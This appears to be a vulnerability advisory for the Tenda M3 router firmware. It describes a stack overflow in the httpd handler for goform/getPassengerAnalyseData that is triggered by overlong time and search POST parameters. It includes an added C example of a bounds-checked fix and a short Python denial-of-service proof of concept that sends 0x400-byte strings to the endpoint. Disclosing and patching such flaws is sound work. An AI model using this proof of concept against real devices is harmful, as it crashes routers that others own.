- The device's official website: https://www.tenda.com.cn/product/M3.html
- Firmware download website: https://www.tenda.com.cn/download/detail-3133.html
- Firmware version: V1.0.0.12(4856)
httpd in directory /bin has a stack overflow vulnerability. The vulnerability occurs in the formGetPassengerAnalyseData function, which can be accessed via the URL goform/getPassengerAnalyseData.
The formGetPassengerAnalyseData function reads the POST parameters time and search and copies them to a stack buffer without checking their length, causing a stack overflow.
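The missing check, sketched as an added example for anyone patching or reviewing a handler like this one (it is not Tenda's code and not from the original advisory): each parameter is measured against its destination buffer and an oversized request is rejected rather than copied. The buffer sizes, `copy_param` and `handle_passenger_query` are assumptions, since the advisory does not show the firmware's source.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Assumed sizes: the advisory does not state the real buffer sizes. */
#define TIME_BUF_LEN   32
#define SEARCH_BUF_LEN 64

/* Copy a request parameter into a fixed buffer only if it fits, including
 * the terminating NUL. Returns 0 on success, -1 if the value is missing or
 * too long; on failure dst is left as an empty string. (Hypothetical helper.) */
static int copy_param(char *dst, size_t dst_len, const char *src)
{
    const char *end;

    if (dst == NULL || dst_len == 0)
        return -1;
    dst[0] = '\0';
    if (src == NULL)
        return -1;
    /* Look for the terminator within dst_len bytes only. */
    end = memchr(src, '\0', dst_len);
    if (end == NULL)
        return -1;                      /* does not fit: reject, never truncate */
    memcpy(dst, src, (size_t)(end - src) + 1);
    return 0;
}

/* Hypothetical handler body for the time/search parameters.
 * Returns the HTTP status the server would send. */
static int handle_passenger_query(const char *time_val, const char *search_val)
{
    char time_buf[TIME_BUF_LEN];
    char search_buf[SEARCH_BUF_LEN];

    if (copy_param(time_buf, sizeof time_buf, time_val) != 0 ||
        copy_param(search_buf, sizeof search_buf, search_val) != 0)
        return 400;                     /* missing or oversized parameter */
    /* The query would be processed here using time_buf and search_buf. */
    return 200;
}

int main(void)
{
    char big[0x401];                    /* constructed 0x400-byte value */
    memset(big, 'A', 0x400);
    big[0x400] = '\0';
    printf("normal: %d\n", handle_passenger_query("2024-01-01", "guest"));
    printf("oversized: %d\n", handle_passenger_query(big, big));
    return 0;
}
```

Rejecting the request, instead of silently truncating, also gives the device a clear event to log when oversized parameters arrive.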
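PoC of Denial of Service (DoS)
```python
import requests

# Oversized values for the two POST parameters the handler copies to the stack
data = {
    b"time": b'A' * 0x400,
    b"search": b'A' * 0x400,
}
# Cookie names must be str, not bytes, for requests to send them correctly
cookies = {
    "user": "admin",
}
res = requests.post("http://127.0.0.1/goform/getPassengerAnalyseData", data=data, cookies=cookies)
print(res.content)
```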
